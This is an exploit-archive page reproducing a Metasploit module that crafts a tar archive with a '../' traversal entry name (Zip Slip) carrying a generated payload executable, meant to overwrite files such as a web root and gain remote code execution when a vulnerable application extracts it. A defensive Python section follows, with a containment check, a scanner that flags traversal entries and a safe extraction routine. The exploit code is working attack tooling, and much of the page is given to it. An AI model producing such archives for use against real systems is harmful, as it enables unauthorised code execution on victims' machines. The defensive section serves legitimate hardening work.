Generic Zip Slip Traversal

2019.09.12
Credit: sinn3r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Generic Zip Slip Traversal Vulnerability",
      'Description'    => %q{
        This is a generic arbitrary file overwrite technique, which typically results in remote
        command execution. This targets a simple yet widespread vulnerability that has been seen
        affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc. The idea is
        that often archive extraction libraries have no mitigations against directory traversal
        attacks. If an application uses it, there is a risk when opening an archive that is
        maliciously modified, and result in the embedded payload to be written to an arbitrary
        location (such as a web root), and result in remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Snyk',   # Technique discovery
          'sinn3r'  # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
      'Platform'       => ['linux', 'win', 'unix'],
      'Targets'        =>
        [
          ['Manually determined', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 05 2018"
    ))

    register_options([
      OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
    ])
  end

  # Builds an in-memory tar whose single entry carries the traversal name
  # supplied by the user (e.g. '../payload.bin').
  class ZipSlipArchive
    attr_reader :data
    attr_reader :fname
    attr_reader :payload

    def initialize(n, p)
      @fname = n
      @payload = p
      @data = make
    end

    def make
      path = Rex::FileUtils.normalize_unix_path(fname)
      tar = StringIO.new
      Rex::Tar::Writer.new(tar) do |t|
        t.add_file(path, 0777) do |f|
          f.write(payload)
        end
      end
      tar.seek(0)
      data = tar.read
      tar.close
      data
    end
  end

  def make_tar(target_payload_path)
    # Generate the payload executable once and wrap it in the archive;
    # the archive bytes are already built in ZipSlipArchive#initialize.
    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe(code: payload.encoded))
    archive.data
  end

  def exploit
    target_payload_path = datastore['TARGETPAYLOADPATH']
    unless target_payload_path.match(/\.\.\//)
      print_error('Please set a traversal path')
      return
    end

    tar = make_tar(target_payload_path)
    file_create(tar)
    print_status('When extracted, the payload is expected to extract to:')
    print_status(target_payload_path)
  end
end

=begin
A quick test:

$ python
>>> import tarfile
>>> t = tarfile.open('test.tar')
>>> t.extractall()
>>> exit()
=end
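The module's description and its "quick test" comment both point at the same root cause: an extractor that trusts member names and writes wherever they point. The following Python is an added example, not part of the Metasploit module or of cxsecurity's page, showing the containment check an extractor needs and a pre-extraction scan that flags offending entries. It constructs its own sample tar in memory (the member names and contents are constructed here; the `../payload.bin` name mirrors the module's default option) and uses only the standard library; the function names are the example's own.

```python
import io
import os
import tarfile

# Constructed sample archive (not from the page): one benign entry plus one
# whose name uses the same '../payload.bin' traversal the module defaults to.
SAMPLE_MEMBERS = (
    ("docs/readme.txt", b"benign file\n"),
    ("../payload.bin", b"\x7fELF-placeholder-not-a-real-binary"),
)


def build_sample_archive(include_traversal=True):
    """Build an in-memory tar containing the constructed sample members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in SAMPLE_MEMBERS:
            if name.startswith("..") and not include_traversal:
                continue
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def is_safe_member(dest_dir, member):
    """True only if extracting `member` cannot write outside `dest_dir`.

    Resolve the final on-disk path and require it to stay under the
    destination. Links are rejected outright: their targets would need the
    same check, and a link extracted first can redirect a later write.
    """
    dest = os.path.realpath(dest_dir)
    if member.issym() or member.islnk():
        return False
    if os.path.isabs(member.name):
        return False
    target = os.path.realpath(os.path.join(dest, member.name))
    return os.path.commonpath([dest, target]) == dest


def find_traversal_members(archive_bytes, dest_dir="extracted"):
    """Names of members that would escape dest_dir (detection, no writes)."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        return [m.name for m in tar.getmembers() if not is_safe_member(dest_dir, m)]


def safe_extractall(archive_bytes, dest_dir):
    """Extract only after every member has passed the containment check."""
    bad = find_traversal_members(archive_bytes, dest_dir)
    if bad:
        raise ValueError("refusing to extract: traversal entries %r" % bad)
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        tar.extractall(dest_dir)


if __name__ == "__main__":
    print("flagged:", find_traversal_members(build_sample_archive()))
    print("flagged (clean archive):", find_traversal_members(build_sample_archive(False)))
```

Run stand-alone it reports `['../payload.bin']` for the constructed archive and nothing for the clean variant. The same `is_safe_member` logic applies to zip entries (`ZipInfo.filename`) with the link checks replaced by a mode test. On Python 3.12 and later, `tarfile.extractall(path, filter="data")` applies an equivalent built-in policy; the explicit check above is what older interpreters and other extraction libraries must do themselves.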


Copyright 2019, cxsecurity.com